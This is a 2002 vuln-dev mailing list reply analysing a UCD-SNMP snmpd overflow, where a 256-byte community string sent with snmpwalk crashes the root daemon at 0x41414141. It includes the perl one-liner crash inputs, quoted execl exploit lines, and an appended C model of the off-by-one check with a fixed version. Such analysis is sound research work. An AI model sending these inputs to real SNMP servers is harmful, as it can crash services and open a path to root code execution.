Vulnerability Development mailing list archives
Re: snmpd exploit examination - snmpwalk
From: Syzop <syz () dds nl>
Date: Thu, 21 Feb 2002 22:59:19 +0100
Hi, KF wrote:

> I am not so sure about those proof of concept remote snmp exploits that were
> posted... they look more like local exploits to me.
>
> [root@linuxppc root]# ps -ef | grep snmp
> root 6355 1 17 15:02 pts/1 00:00:59 /usr/sbin/snmpd -s -l /dev/null
>
> (gdb) r 127.0.0.1 public `perl -e 'print "A" x 293'`
> Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 293'`
> Program received signal SIGSEGV, Segmentation fault.
I get the same results with: snmpwalk 127.0.0.1 public <long buffer>.

$ snmpwalk 127.0.0.1 public `perl -e 'print "A" x 3000'`
Segmentation fault
Feb 21 22:24:08 syzop kernel: pid 26942 (snmpwalk), uid 1001 exited on signal 11 reading or executing 0x41414141

However, the exploit is doing: snmpwalk -p <port> <host> <long buffer>

[..]
> These are the examples I have seen in various emails as methods to exploit
> snmpd... These seem to do nothing on my box to the client or the daemon...
>
> snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 256'`
> execl("snmpwalk", "snmpwalk", "-p", port, host, buf, NULL);
> execl("/usr/local/bin/snmpwalk","snmpwalk",argv[1],"-c",buffer,NULL);
I tested this after the mail of H D Moore: 'The UCD-SNMP 4.2.1 package is trivial to exploit. A community string of exactly 256 bytes will smash eip.'

So:

$ snmpwalk 127.0.0.1 `perl -e 'print "A" x 256'`

(then syslog reports:)

Feb 21 22:36:44 syzop kernel: pid 27154 (snmpd), uid 0 exited on signal 11 reading or executing 0x41414141

Or at least here :)). Tested on rh7.1 and debian 2.2 (both ia32).
> Here are my results.

--snip--

Same results as here with your values. It looks like it really has to be 256 chars here: 255 = nothing, 256 = EIP overwritten, 257 = nothing.
> Give it too many chars and snmpwalk complains.
>
> [root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 5000'`
> snmpwalk: Error building ASN.1 representation
Same here after ~8200 chars.

Cya,
Syzop.

PS: Resend since I forgot to include vuln-dev :P
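The "255 = nothing, 256 = EIP overwritten, 257 = nothing" pattern reported above is the signature of an off-by-one bound check rather than an unbounded copy: a check written as `len > 256` lets a 256-byte string through, the copy fits, and only the terminating NUL lands one byte past the buffer. On x86 the byte directly above a 256-byte stack local is commonly the saved frame pointer, and a single NUL written there makes the caller's `leave; ret` pop its return address from inside attacker-controlled data, which is one explanation consistent with a process dying at 0x41414141. The block below is an added, constructed model of that bug class; it is not UCD-SNMP code, the thread does not show the real routine, and the buffer size, the `>` versus `>=` check and the sentinel layout are all assumptions. It places a sentinel byte immediately after a 256-byte buffer and reports whether copies of 255, 256 and 257 bytes clobber it under the buggy and the corrected check.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size, chosen to match the 256-byte boundary seen in the thread. */
#define COMMUNITY_MAX 256
#define SENTINEL_VALUE 0xAA

enum copy_result { COPY_REJECTED = -1, COPY_CLEAN = 0, COPY_OVERFLOWED = 1 };

/* Model of the stack region: the community buffer plus the single byte that
 * follows it. The sentinel stands in for whatever a real frame keeps just
 * above a 256-byte local (commonly the saved frame pointer on x86). Keeping
 * both in one array keeps the off-by-one write inside a defined object. */
struct frame_model {
    unsigned char mem[COMMUNITY_MAX + 1];
};

/* Hypothetical copy routine. With the buggy check ('>') a 256-byte string
 * passes and the terminating NUL lands on mem[256]. With the hardened check
 * ('>=') a 256-byte string is refused just like a 257-byte one. */
static enum copy_result copy_community(struct frame_model *f, const char *src,
                                       size_t len, int hardened)
{
    char *buf = (char *)f->mem;                       /* the 256-byte local */
    unsigned char *sentinel = &f->mem[COMMUNITY_MAX];  /* byte right above it */

    if (hardened ? (len >= COMMUNITY_MAX) : (len > COMMUNITY_MAX))
        return COPY_REJECTED;

    *sentinel = SENTINEL_VALUE;
    memcpy(buf, src, len);
    buf[len] = '\0';            /* len == 256 overwrites the sentinel with 0x00 */

    return *sentinel == SENTINEL_VALUE ? COPY_CLEAN : COPY_OVERFLOWED;
}

/* Constructed input: a community string of `len` 'A's, like the perl
 * one-liners in the thread. Returns the outcome for the chosen check. */
enum copy_result probe(size_t len, int hardened)
{
    static char input[COMMUNITY_MAX + 64];
    struct frame_model f;

    if (len >= sizeof input)
        len = sizeof input - 1;
    memset(input, 'A', len);
    input[len] = '\0';
    return copy_community(&f, input, len, hardened);
}

static const char *describe(enum copy_result r)
{
    switch (r) {
    case COPY_REJECTED:   return "rejected";
    case COPY_CLEAN:      return "fits, nothing clobbered";
    case COPY_OVERFLOWED: return "byte past the buffer clobbered";
    }
    return "?";
}

int main(void)
{
    static const size_t lens[] = { 255, 256, 257 };
    for (size_t i = 0; i < 3; i++) {
        printf("%3zu bytes: buggy check -> %-32s hardened check -> %s\n",
               lens[i], describe(probe(lens[i], 0)),
               describe(probe(lens[i], 1)));
    }
    return 0;
}
```

Only the 256-byte case differs between the two checks, which is exactly the shape of the results in this thread; a plain missing bound check would instead crash on everything from the buffer size upward.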
Current thread:
- snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk Syzop (Feb 21)
- Re: snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk xbud (Feb 21)
- Re: snmpd exploit examination - snmpwalk The Itch (Feb 21)